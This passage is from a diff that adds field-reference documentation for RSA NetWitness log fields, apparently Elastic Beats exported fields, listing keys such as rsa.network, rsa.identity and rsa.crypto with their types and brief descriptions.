+*`rsa.misc.cs_registrar`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_represult`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_rpayload`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_sampler_name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_sourcemodule`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_streams`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_targetmodule`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_v6nxthop`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_whois_server`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_yararesult`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.description`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.devvendor`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.distance`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.dstburb`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.edomain`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.edomaub`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.euid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.facility`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.finterface`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.flags`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.gaddr`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.id3`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_buddyname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_croomid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_croomtype`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_members`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_username`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.ipkt`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.ipscat`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.ipspri`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.latitude`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.linenum`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.list_name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.load_data`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.location_floor`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.location_mark`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.log_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.log_type`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.logid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.logip`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.logname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.longitude`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.lport`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.mbug_data`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.misc_name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.msg_type`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.msgid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.netsessid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.num`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.number1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.number2`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.nwwn`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.object`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.operation`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.opkt`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.orig_from`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.owner_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.p_action`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.p_filter`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.p_group_object`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.p_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.p_msgid1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.p_msgid2`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.p_result1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.password_chg`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.password_expire`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.permgranted`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.permwanted`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.pgid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.policyUUID`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.prog_asp_num`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.program`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.real_data`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.rec_asp_device`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.rec_asp_num`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.rec_library`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.recordnum`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.ruid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sburb`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sdomain_fld`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sec`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sensorname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.seqnum`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.session`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sessiontype`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sigUUID`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.spi`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.srcburb`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.srcdom`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.srcservice`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.state`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.status1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.svcno`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.system`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.tbdstr1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.tgtdom`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.tgtdomain`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.threshold`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.type1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.udb_class`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.url_fld`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.user_div`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.userid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.username_fld`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.utcstamp`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.v_instafname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.virt_data`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.vpnid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.autorun_type`*:: ++ +-- +This is used to capture Auto Run type + +type: keyword + +-- + +*`rsa.misc.cc_number`*:: ++ +-- +Valid Credit Card Numbers only + +type: long + +-- + +*`rsa.misc.content`*:: ++ +-- +This key captures the content type from protocol headers + +type: keyword + +-- + +*`rsa.misc.ein_number`*:: ++ +-- +Employee Identification Numbers only + +type: long + +-- + +*`rsa.misc.found`*:: ++ +-- +This is used to capture the results of regex match + +type: keyword + +-- + +*`rsa.misc.language`*:: ++ +-- +This is used to capture list of languages the client support and what it prefers + +type: keyword + +-- + +*`rsa.misc.lifetime`*:: ++ +-- +This key is used to capture the session lifetime in seconds. + +type: long + +-- + +*`rsa.misc.link`*:: ++ +-- +This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.misc.match`*:: ++ +-- +This key is for regex match name from search.ini + +type: keyword + +-- + +*`rsa.misc.param_dst`*:: ++ +-- +This key captures the command line/launch argument of the target process or file + +type: keyword + +-- + +*`rsa.misc.param_src`*:: ++ +-- +This key captures source parameter + +type: keyword + +-- + +*`rsa.misc.search_text`*:: ++ +-- +This key captures the Search Text used + +type: keyword + +-- + +*`rsa.misc.sig_name`*:: ++ +-- +This key is used to capture the Signature Name only. + +type: keyword + +-- + +*`rsa.misc.snmp_value`*:: ++ +-- +SNMP set request value + +type: keyword + +-- + +*`rsa.misc.streams`*:: ++ +-- +This key captures number of streams in session + +type: long + +-- + + +*`rsa.db.index`*:: ++ +-- +This key captures IndexID of the index. + +type: keyword + +-- + +*`rsa.db.instance`*:: ++ +-- +This key is used to capture the database server instance name + +type: keyword + +-- + +*`rsa.db.database`*:: ++ +-- +This key is used to capture the name of a database or an instance as seen in a session + +type: keyword + +-- + +*`rsa.db.transact_id`*:: ++ +-- +This key captures the SQL transantion ID of the current session + +type: keyword + +-- + +*`rsa.db.permissions`*:: ++ +-- +This key captures permission or privilege level assigned to a resource. + +type: keyword + +-- + +*`rsa.db.table_name`*:: ++ +-- +This key is used to capture the table name + +type: keyword + +-- + +*`rsa.db.db_id`*:: ++ +-- +This key is used to capture the unique identifier for a database + +type: keyword + +-- + +*`rsa.db.db_pid`*:: ++ +-- +This key captures the process id of a connection with database server + +type: long + +-- + +*`rsa.db.lread`*:: ++ +-- +This key is used for the number of logical reads + +type: long + +-- + +*`rsa.db.lwrite`*:: ++ +-- +This key is used for the number of logical writes + +type: long + +-- + +*`rsa.db.pread`*:: ++ +-- +This key is used for the number of physical writes + +type: long + +-- + + +*`rsa.network.alias_host`*:: ++ +-- +This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. + +type: keyword + +-- + +*`rsa.network.domain`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.host_dst`*:: ++ +-- +This key should only be used when it’s a Destination Hostname + +type: keyword + +-- + +*`rsa.network.network_service`*:: ++ +-- +This is used to capture layer 7 protocols/service names + +type: keyword + +-- + +*`rsa.network.interface`*:: ++ +-- +This key should be used when the source or destination context of an interface is not clear + +type: keyword + +-- + +*`rsa.network.network_port`*:: ++ +-- +Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) + +type: long + +-- + +*`rsa.network.eth_host`*:: ++ +-- +Deprecated, use alias.mac + +type: keyword + +-- + +*`rsa.network.sinterface`*:: ++ +-- +This key should only be used when it’s a Source Interface + +type: keyword + +-- + +*`rsa.network.dinterface`*:: ++ +-- +This key should only be used when it’s a Destination Interface + +type: keyword + +-- + +*`rsa.network.vlan`*:: ++ +-- +This key should only be used to capture the ID of the Virtual LAN + +type: long + +-- + +*`rsa.network.zone_src`*:: ++ +-- +This key should only be used when it’s a Source Zone. + +type: keyword + +-- + +*`rsa.network.zone`*:: ++ +-- +This key should be used when the source or destination context of a Zone is not clear + +type: keyword + +-- + +*`rsa.network.zone_dst`*:: ++ +-- +This key should only be used when it’s a Destination Zone. + +type: keyword + +-- + +*`rsa.network.gateway`*:: ++ +-- +This key is used to capture the IP Address of the gateway + +type: keyword + +-- + +*`rsa.network.icmp_type`*:: ++ +-- +This key is used to capture the ICMP type only + +type: long + +-- + +*`rsa.network.mask`*:: ++ +-- +This key is used to capture the device network IPmask. + +type: keyword + +-- + +*`rsa.network.icmp_code`*:: ++ +-- +This key is used to capture the ICMP code only + +type: long + +-- + +*`rsa.network.protocol_detail`*:: ++ +-- +This key should be used to capture additional protocol information + +type: keyword + +-- + +*`rsa.network.dmask`*:: ++ +-- +This key is used for Destionation Device network mask + +type: keyword + +-- + +*`rsa.network.port`*:: ++ +-- +This key should only be used to capture a Network Port when the directionality is not clear + +type: long + +-- + +*`rsa.network.smask`*:: ++ +-- +This key is used for capturing source Network Mask + +type: keyword + +-- + +*`rsa.network.netname`*:: ++ +-- +This key is used to capture the network name associated with an IP range. This is configured by the end user. + +type: keyword + +-- + +*`rsa.network.paddr`*:: ++ +-- +Deprecated + +type: ip + +-- + +*`rsa.network.faddr`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.lhost`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.origin`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.remote_domain_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.addr`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.dns_a_record`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.dns_ptr_record`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.fhost`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.fport`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.laddr`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.linterface`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.phost`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.ad_computer_dst`*:: ++ +-- +Deprecated, use host.dst + +type: keyword + +-- + +*`rsa.network.eth_type`*:: ++ +-- +This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only + +type: long + +-- + +*`rsa.network.ip_proto`*:: ++ +-- +This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI + +type: long + +-- + +*`rsa.network.dns_cname_record`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.dns_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.dns_opcode`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.dns_resp`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.dns_type`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.domain1`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.host_type`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.packet_length`*:: ++ +-- +type: keyword + +-- + +*`rsa.network.host_orig`*:: ++ +-- +This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. + +type: keyword + +-- + +*`rsa.network.rpayload`*:: ++ +-- +This key is used to capture the total number of payload bytes seen in the retransmitted packets. + +type: keyword + +-- + +*`rsa.network.vlan_name`*:: ++ +-- +This key should only be used to capture the name of the Virtual LAN + +type: keyword + +-- + + +*`rsa.investigations.ec_activity`*:: ++ +-- +This key captures the particular event activity(Ex:Logoff) + +type: keyword + +-- + +*`rsa.investigations.ec_theme`*:: ++ +-- +This key captures the Theme of a particular Event(Ex:Authentication) + +type: keyword + +-- + +*`rsa.investigations.ec_subject`*:: ++ +-- +This key captures the Subject of a particular Event(Ex:User) + +type: keyword + +-- + +*`rsa.investigations.ec_outcome`*:: ++ +-- +This key captures the outcome of a particular Event(Ex:Success) + +type: keyword + +-- + +*`rsa.investigations.event_cat`*:: ++ +-- +This key captures the Event category number + +type: long + +-- + +*`rsa.investigations.event_cat_name`*:: ++ +-- +This key captures the event category name corresponding to the event cat code + +type: keyword + +-- + +*`rsa.investigations.event_vcat`*:: ++ +-- +This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. + +type: keyword + +-- + +*`rsa.investigations.analysis_file`*:: ++ +-- +This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file + +type: keyword + +-- + +*`rsa.investigations.analysis_service`*:: ++ +-- +This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service + +type: keyword + +-- + +*`rsa.investigations.analysis_session`*:: ++ +-- +This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session + +type: keyword + +-- + +*`rsa.investigations.boc`*:: ++ +-- +This is used to capture behaviour of compromise + +type: keyword + +-- + +*`rsa.investigations.eoc`*:: ++ +-- +This is used to capture Enablers of Compromise + +type: keyword + +-- + +*`rsa.investigations.inv_category`*:: ++ +-- +This used to capture investigation category + +type: keyword + +-- + +*`rsa.investigations.inv_context`*:: ++ +-- +This used to capture investigation context + +type: keyword + +-- + +*`rsa.investigations.ioc`*:: ++ +-- +This is key capture indicator of compromise + +type: keyword + +-- + + +*`rsa.counters.dclass_c1`*:: ++ +-- +This is a generic counter key that should be used with the label dclass.c1.str only + +type: long + +-- + +*`rsa.counters.dclass_c2`*:: ++ +-- +This is a generic counter key that should be used with the label dclass.c2.str only + +type: long + +-- + +*`rsa.counters.event_counter`*:: ++ +-- +This is used to capture the number of times an event repeated + +type: long + +-- + +*`rsa.counters.dclass_r1`*:: ++ +-- +This is a generic ratio key that should be used with the label dclass.r1.str only + +type: keyword + +-- + +*`rsa.counters.dclass_c3`*:: ++ +-- +This is a generic counter key that should be used with the label dclass.c3.str only + +type: long + +-- + +*`rsa.counters.dclass_c1_str`*:: ++ +-- +This is a generic counter string key that should be used with the label dclass.c1 only + +type: keyword + +-- + +*`rsa.counters.dclass_c2_str`*:: ++ +-- +This is a generic counter string key that should be used with the label dclass.c2 only + +type: keyword + +-- + +*`rsa.counters.dclass_r1_str`*:: ++ +-- +This is a generic ratio string key that should be used with the label dclass.r1 only + +type: keyword + +-- + +*`rsa.counters.dclass_r2`*:: ++ +-- +This is a generic ratio key that should be used with the label dclass.r2.str only + +type: keyword + +-- + +*`rsa.counters.dclass_c3_str`*:: ++ +-- +This is a generic counter string key that should be used with the label dclass.c3 only + +type: keyword + +-- + +*`rsa.counters.dclass_r3`*:: ++ +-- +This is a generic ratio key that should be used with the label dclass.r3.str only + +type: keyword + +-- + +*`rsa.counters.dclass_r2_str`*:: ++ +-- +This is a generic ratio string key that should be used with the label dclass.r2 only + +type: keyword + +-- + +*`rsa.counters.dclass_r3_str`*:: ++ +-- +This is a generic ratio string key that should be used with the label dclass.r3 only + +type: keyword + +-- + + +*`rsa.identity.auth_method`*:: ++ +-- +This key is used to capture authentication methods used only + +type: keyword + +-- + +*`rsa.identity.user_role`*:: ++ +-- +This key is used to capture the Role of a user only + +type: keyword + +-- + +*`rsa.identity.dn`*:: ++ +-- +X.500 (LDAP) Distinguished Name + +type: keyword + +-- + +*`rsa.identity.logon_type`*:: ++ +-- +This key is used to capture the type of logon method used. + +type: keyword + +-- + +*`rsa.identity.profile`*:: ++ +-- +This key is used to capture the user profile + +type: keyword + +-- + +*`rsa.identity.accesses`*:: ++ +-- +This key is used to capture actual privileges used in accessing an object + +type: keyword + +-- + +*`rsa.identity.realm`*:: ++ +-- +Radius realm or similar grouping of accounts + +type: keyword + +-- + +*`rsa.identity.user_sid_dst`*:: ++ +-- +This key captures Destination User Session ID + +type: keyword + +-- + +*`rsa.identity.dn_src`*:: ++ +-- +An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn + +type: keyword + +-- + +*`rsa.identity.org`*:: ++ +-- +This key captures the User organization + +type: keyword + +-- + +*`rsa.identity.dn_dst`*:: ++ +-- +An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn + +type: keyword + +-- + +*`rsa.identity.firstname`*:: ++ +-- +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information + +type: keyword + +-- + +*`rsa.identity.lastname`*:: ++ +-- +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information + +type: keyword + +-- + +*`rsa.identity.user_dept`*:: ++ +-- +User's Department Names only + +type: keyword + +-- + +*`rsa.identity.user_sid_src`*:: ++ +-- +This key captures Source User Session ID + +type: keyword + +-- + +*`rsa.identity.federated_sp`*:: ++ +-- +This key is the Federated Service Provider. This is the application requesting authentication. + +type: keyword + +-- + +*`rsa.identity.federated_idp`*:: ++ +-- +This key is the federated Identity Provider. This is the server providing the authentication. + +type: keyword + +-- + +*`rsa.identity.logon_type_desc`*:: ++ +-- +This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. + +type: keyword + +-- + +*`rsa.identity.middlename`*:: ++ +-- +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information + +type: keyword + +-- + +*`rsa.identity.password`*:: ++ +-- +This key is for Passwords seen in any session, plain text or encrypted + +type: keyword + +-- + +*`rsa.identity.host_role`*:: ++ +-- +This key should only be used to capture the role of a Host Machine + +type: keyword + +-- + +*`rsa.identity.ldap`*:: ++ +-- +This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context + +type: keyword + +-- + +*`rsa.identity.ldap_query`*:: ++ +-- +This key is the Search criteria from an LDAP search + +type: keyword + +-- + +*`rsa.identity.ldap_response`*:: ++ +-- +This key is to capture Results from an LDAP search + +type: keyword + +-- + +*`rsa.identity.owner`*:: ++ +-- +This is used to capture username the process or service is running as, the author of the task + +type: keyword + +-- + +*`rsa.identity.service_account`*:: ++ +-- +This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage + +type: keyword + +-- + + +*`rsa.email.email_dst`*:: ++ +-- +This key is used to capture the Destination email address only, when the destination context is not clear use email + +type: keyword + +-- + +*`rsa.email.email_src`*:: ++ +-- +This key is used to capture the source email address only, when the source context is not clear use email + +type: keyword + +-- + +*`rsa.email.subject`*:: ++ +-- +This key is used to capture the subject string from an Email only. + +type: keyword + +-- + +*`rsa.email.email`*:: ++ +-- +This key is used to capture a generic email address where the source or destination context is not clear + +type: keyword + +-- + +*`rsa.email.trans_from`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.email.trans_to`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + + +*`rsa.file.privilege`*:: ++ +-- +Deprecated, use permissions + +type: keyword + +-- + +*`rsa.file.attachment`*:: ++ +-- +This key captures the attachment file name + +type: keyword + +-- + +*`rsa.file.filesystem`*:: ++ +-- +type: keyword + +-- + +*`rsa.file.binary`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.file.filename_dst`*:: ++ +-- +This is used to capture name of the file targeted by the action + +type: keyword + +-- + +*`rsa.file.filename_src`*:: ++ +-- +This is used to capture name of the parent filename, the file which performed the action + +type: keyword + +-- + +*`rsa.file.filename_tmp`*:: ++ +-- +type: keyword + +-- + +*`rsa.file.directory_dst`*:: ++ +-- +This key is used to capture the directory of the target process or file + +type: keyword + +-- + +*`rsa.file.directory_src`*:: ++ +-- +This key is used to capture the directory of the source process or file + +type: keyword + +-- + +*`rsa.file.file_entropy`*:: ++ +-- +This is used to capture entropy vale of a file + +type: double + +-- + +*`rsa.file.file_vendor`*:: ++ +-- +This is used to capture Company name of file located in version_info + +type: keyword + +-- + +*`rsa.file.task_name`*:: ++ +-- +This is used to capture name of the task + +type: keyword + +-- + + +*`rsa.web.fqdn`*:: ++ +-- +Fully Qualified Domain Names + +type: keyword + +-- + +*`rsa.web.web_cookie`*:: ++ +-- +This key is used to capture the Web cookies specifically. + +type: keyword + +-- + +*`rsa.web.alias_host`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.reputation_num`*:: ++ +-- +Reputation Number of an entity. Typically used for Web Domains + +type: double + +-- + +*`rsa.web.web_ref_domain`*:: ++ +-- +Web referer's domain + +type: keyword + +-- + +*`rsa.web.web_ref_query`*:: ++ +-- +This key captures Web referer's query portion of the URL + +type: keyword + +-- + +*`rsa.web.remote_domain`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.web_ref_page`*:: ++ +-- +This key captures Web referer's page information + +type: keyword + +-- + +*`rsa.web.web_ref_root`*:: ++ +-- +Web referer's root URL path + +type: keyword + +-- + +*`rsa.web.cn_asn_dst`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.cn_rpackets`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.urlpage`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.urlroot`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.p_url`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.p_user_agent`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.p_web_cookie`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.p_web_method`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.p_web_referer`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.web_extension_tmp`*:: ++ +-- +type: keyword + +-- + +*`rsa.web.web_page`*:: ++ +-- +type: keyword + +-- + + +*`rsa.threat.threat_category`*:: ++ +-- +This key captures Threat Name/Threat Category/Categorization of alert + +type: keyword + +-- + +*`rsa.threat.threat_desc`*:: ++ +-- +This key is used to capture the threat description from the session directly or inferred + +type: keyword + +-- + +*`rsa.threat.alert`*:: ++ +-- +This key is used to capture name of the alert + +type: keyword + +-- + +*`rsa.threat.threat_source`*:: ++ +-- +This key is used to capture source of the threat + +type: keyword + +-- + + +*`rsa.crypto.crypto`*:: ++ +-- +This key is used to capture the Encryption Type or Encryption Key only + +type: keyword + +-- + +*`rsa.crypto.cipher_src`*:: ++ +-- +This key is for Source (Client) Cipher + +type: keyword + +-- + +*`rsa.crypto.cert_subject`*:: ++ +-- +This key is used to capture the Certificate organization only + +type: keyword + +-- + +*`rsa.crypto.peer`*:: ++ +-- +This key is for Encryption peer's IP Address + +type: keyword + +-- + +*`rsa.crypto.cipher_size_src`*:: ++ +-- +This key captures Source (Client) Cipher Size + +type: long + +-- + +*`rsa.crypto.ike`*:: ++ +-- +IKE negotiation phase. + +type: keyword + +-- + +*`rsa.crypto.scheme`*:: ++ +-- +This key captures the Encryption scheme used + +type: keyword + +-- + +*`rsa.crypto.peer_id`*:: ++ +-- +This key is for Encryption peer’s identity + +type: keyword + +-- + +*`rsa.crypto.sig_type`*:: ++ +-- +This key captures the Signature Type + +type: keyword + +-- + +*`rsa.crypto.cert_issuer`*:: ++ +-- +type: keyword + +-- + +*`rsa.crypto.cert_host_name`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.crypto.cert_error`*:: ++ +-- +This key captures the Certificate Error String + +type: keyword + +-- + +*`rsa.crypto.cipher_dst`*:: ++ +-- +This key is for Destination (Server) Cipher + +type: keyword + +-- + +*`rsa.crypto.cipher_size_dst`*:: ++ +-- +This key captures Destination (Server) Cipher Size + +type: long + +-- + +*`rsa.crypto.ssl_ver_src`*:: ++ +-- +Deprecated, use version + +type: keyword + +-- + +*`rsa.crypto.d_certauth`*:: ++ +-- +type: keyword + +-- + +*`rsa.crypto.s_certauth`*:: ++ +-- +type: keyword + +-- + +*`rsa.crypto.ike_cookie1`*:: ++ +-- +ID of the negotiation — sent for ISAKMP Phase One + +type: keyword + +-- + +*`rsa.crypto.ike_cookie2`*:: ++ +-- +ID of the negotiation — sent for ISAKMP Phase Two + +type: keyword + +-- + +*`rsa.crypto.cert_checksum`*:: ++ +-- +type: keyword + +-- + +*`rsa.crypto.cert_host_cat`*:: ++ +-- +This key is used for the hostname category value of a certificate + +type: keyword + +-- + +*`rsa.crypto.cert_serial`*:: ++ +-- +This key is used to capture the Certificate serial number only + +type: keyword + +-- + +*`rsa.crypto.cert_status`*:: ++ +-- +This key captures Certificate validation status + +type: keyword + +-- + +*`rsa.crypto.ssl_ver_dst`*:: ++ +-- +Deprecated, use version + +type: keyword + +-- + +*`rsa.crypto.cert_keysize`*:: ++ +-- +type: keyword + +-- + +*`rsa.crypto.cert_username`*:: ++ +-- +type: keyword + +-- + +*`rsa.crypto.https_insact`*:: ++ +-- +type: keyword + +-- + +*`rsa.crypto.https_valid`*:: ++ +-- +type: keyword + +-- + +*`rsa.crypto.cert_ca`*:: ++ +-- +This key is used to capture the Certificate signing authority only + +type: keyword + +-- + +*`rsa.crypto.cert_common`*:: ++ +-- +This key is used to capture the Certificate common name only + +type: keyword + +-- + + +*`rsa.wireless.wlan_ssid`*:: ++ +-- +This key is used to capture the ssid of a Wireless Session + +type: keyword + +-- + +*`rsa.wireless.access_point`*:: ++ +-- +This key is used to capture the access point name. + +type: keyword + +-- + +*`rsa.wireless.wlan_channel`*:: ++ +-- +This is used to capture the channel names + +type: long + +-- + +*`rsa.wireless.wlan_name`*:: ++ +-- +This key captures either WLAN number/name + +type: keyword + +-- + + +*`rsa.storage.disk_volume`*:: ++ +-- +A unique name assigned to logical units (volumes) within a physical disk + +type: keyword + +-- + +*`rsa.storage.lun`*:: ++ +-- +Logical Unit Number.This key is a very useful concept in Storage. + +type: keyword + +-- + +*`rsa.storage.pwwn`*:: ++ +-- +This uniquely identifies a port on a HBA. + +type: keyword + +-- + + +*`rsa.physical.org_dst`*:: ++ +-- +This is used to capture the destination organization based on the GEOPIP Maxmind database. + +type: keyword + +-- + +*`rsa.physical.org_src`*:: ++ +-- +This is used to capture the source organization based on the GEOPIP Maxmind database. + +type: keyword + +-- + + +*`rsa.healthcare.patient_fname`*:: ++ +-- +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information + +type: keyword + +-- + +*`rsa.healthcare.patient_id`*:: ++ +-- +This key captures the unique ID for a patient + +type: keyword + +-- + +*`rsa.healthcare.patient_lname`*:: ++ +-- +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information + +type: keyword + +-- + +*`rsa.healthcare.patient_mname`*:: ++ +-- +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information + +type: keyword + +-- + + +*`rsa.endpoint.host_state`*:: ++ +-- +This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on + +type: keyword + +-- + +*`rsa.endpoint.registry_key`*:: ++ +-- +This key captures the path to the registry key + +type: keyword + +-- + +*`rsa.endpoint.registry_value`*:: ++ +-- +This key captures values or decorators used within a registry entry + +type: keyword + +-- + +[[exported-fields-rabbitmq]] +== RabbitMQ fields + +RabbitMQ Module + + + +[float] +=== rabbitmq + + + + +[float] +=== log + +RabbitMQ 